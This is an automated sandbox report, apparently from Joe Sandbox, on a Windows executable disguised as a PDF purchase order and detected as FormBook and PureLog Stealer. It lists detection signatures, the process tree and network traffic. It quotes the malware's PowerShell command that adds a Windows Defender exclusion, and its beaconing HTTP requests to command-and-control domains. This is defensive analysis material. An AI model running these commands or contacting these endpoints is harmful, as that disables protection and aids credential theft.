
Windows Analysis Report
PO 2025918 pdf.exe

Overview

General Information

Sample name: PO 2025918 pdf.exe
Analysis ID: 1590629
MD5: 625d2fae7b900a58c7e9daed1f85cab3
SHA1: 6c61eb8e5851778e4ed57044c50442dae2b875bd
SHA256: d1a82af2d052117e637c17671568650659a93541083f107e4d1b2d357935928d
Tags: exe, user-TeamDreier
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO 2025918 pdf.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\PO 2025918 pdf.exe" MD5: 625D2FAE7B900A58C7E9DAED1F85CAB3)
    • powershell.exe (PID: 1276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO 2025918 pdf.exe (PID: 5560 cmdline: "C:\Users\user\Desktop\PO 2025918 pdf.exe" MD5: 625D2FAE7B900A58C7E9DAED1F85CAB3)
      • mIrIhAjAJblou.exe (PID: 3200 cmdline: "C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7060 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • mIrIhAjAJblou.exe (PID: 2520 cmdline: "C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.PO 2025918 pdf.exe.43d7590.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PO 2025918 pdf.exe.43d7590.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
5.2.PO 2025918 pdf.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.PO 2025918 pdf.exe.5c10000.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PO 2025918 pdf.exe.5c10000.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 2025918 pdf.exe", ParentImage: C:\Users\user\Desktop\PO 2025918 pdf.exe, ParentProcessId: 6468, ParentProcessName: PO 2025918 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", ProcessId: 1276, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 2025918 pdf.exe", ParentImage: C:\Users\user\Desktop\PO 2025918 pdf.exe, ParentProcessId: 6468, ParentProcessName: PO 2025918 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", ProcessId: 1276, ProcessName: powershell.exe
                      No Suricata rule has matched

                      AV Detection

                      Source: PO 2025918 pdf.exe, Virustotal: Detection: 33%
                      Source: PO 2025918 pdf.exe, ReversingLabs: Detection: 34%
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: PO 2025918 pdf.exeJoe Sandbox ML: detected
                      Source: PO 2025918 pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO 2025918 pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: eBJB.pdb source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdb source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mIrIhAjAJblou.exe, 00000007.00000000.2373430247.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3895631434.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO 2025918 pdf.exe, PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: eBJB.pdbSHA256 source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdbGCTL source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0283C600 FindFirstFileW,FindNextFileW,FindClose,8_2_0283C600
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 4x nop then jmp 07C21891h0_2_07C21C9B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then xor eax, eax8_2_02829E10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then pop edi8_2_0282E21E
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h8_2_02F204CE

                      Networking

                      Source: DNS query: www.letsbookcruise.xyz
                      Source: global trafficTCP traffic: 192.168.2.5:49286 -> 162.159.36.2:53
                      Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /tqv2/?Gxq=1VbhX6&t0A=mw5EMDe107YJTqugc68gmErc1Hs+Bqgx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zyzkbcjQAczVPINQnyJ55BFcYg7GslxzSN34k4b/zmS+IfA== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.zucchini.proUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /54nj/?t0A=jQd8/d8A1xfb/FB7GpkT6bk0jTG6GinOCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JjsIyEnVbQOGzSnW49Az79/F0I7s7DjUUiEBnQG3SAllRdw==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vh5g.sbsUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /gq43/?t0A=h/dnkFjaM/BlMTbeYCbPPPvCOUuyeqTz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOG85h61EUnTrHdBHCQyPsxSiY4d4RTFSWTaZW3nKuaFCelg==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.actionhub.liveUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.100millionjobs.africaUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /3541/?t0A=hUAT8pha3r4H+t9+S3MxJs6WhIsd+DYEOZth0k9fm5KLJvCulAvDEPbOc8wYZ2nfufyvJ6Jk1FtS1iVn+RgDiEmRDBrl1krw2W73iPr4/Jg/5IC96P6rf6fefVYTNIm+pw==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.x3kwqc5tye4vl90y.topUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /bqha/?t0A=XaQS++1s5Z2sQk6jmp6aqlAdT5jjUiNTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE4a8JCTBXzC8s0SdcTgnAYDNlXd2JyzVPT3Fze3sMGaFiAg==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /m320/?t0A=Ph0JwVcw7zzuTeHg00MwOUpuuzX2vc4K5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsllCIycJgVOFGc42mqBi0wPhTxFehoqUxxUf8xIGnP1n2EQ==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.truckgoway.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /he9k/?t0A=0MI6+xzwqxZaqD2cO/aG/zu1oIMhaBkQNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOxoEk511kfBxpEvGLE/kVuVEOyttA6Fi+saUHPe6X4Jt0hg==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aloezhealthcare.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: www.zucchini.pro
                      Source: global trafficDNS traffic detected: DNS query: www.vh5g.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.v89ey584d.shop
                      Source: global trafficDNS traffic detected: DNS query: www.actionhub.live
                      Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                      Source: global trafficDNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
                      Source: global trafficDNS traffic detected: DNS query: www.hwak.live
                      Source: global trafficDNS traffic detected: DNS query: www.qzsazi.info
                      Source: global trafficDNS traffic detected: DNS query: www.truckgoway.info
                      Source: global trafficDNS traffic detected: DNS query: www.aloezhealthcare.info
                      Source: global trafficDNS traffic detected: DNS query: www.letsbookcruise.xyz
                      Source: unknownHTTP traffic detected: POST /54nj/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeCache-Control: max-age=0Host: www.vh5g.sbsOrigin: http://www.vh5g.sbsReferer: http://www.vh5g.sbs/54nj/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4Data Raw: 74 30 41 3d 75 53 31 63 38 74 55 50 34 30 66 75 35 54 39 79 64 36 70 42 7a 62 42 6f 67 45 79 59 54 51 32 63 4b 68 79 69 6e 35 67 75 5a 4a 56 7a 36 68 46 34 48 41 76 37 4c 76 34 74 32 4e 74 63 64 64 4a 31 73 41 2b 39 69 59 42 6c 44 76 50 68 6e 4f 64 56 4c 73 39 38 76 73 49 74 42 33 5a 66 5a 2f 6d 45 41 6d 57 6c 2f 67 6a 58 6c 72 64 6d 64 38 6b 36 4b 78 30 66 6f 32 38 79 45 57 72 6f 43 30 6f 69 43 65 63 44 74 48 44 6e 73 31 38 77 34 55 51 71 41 2f 42 62 65 56 52 49 61 32 43 77 78 68 55 55 4e 74 4e 70 33 54 63 6d 46 44 72 4c 73 67 4f 2b 4c 53 6a 2f 37 72 38 38 51 47 5a 42 39 55 47 61 57 6d 55 54 37 51 55 3d Data Ascii: t0A=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNtNp3TcmFDrLsgO+LSj/7r88QGZB9UGaWmUT7QU=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 11:02:19 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 
20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 11:02:22 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 
20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
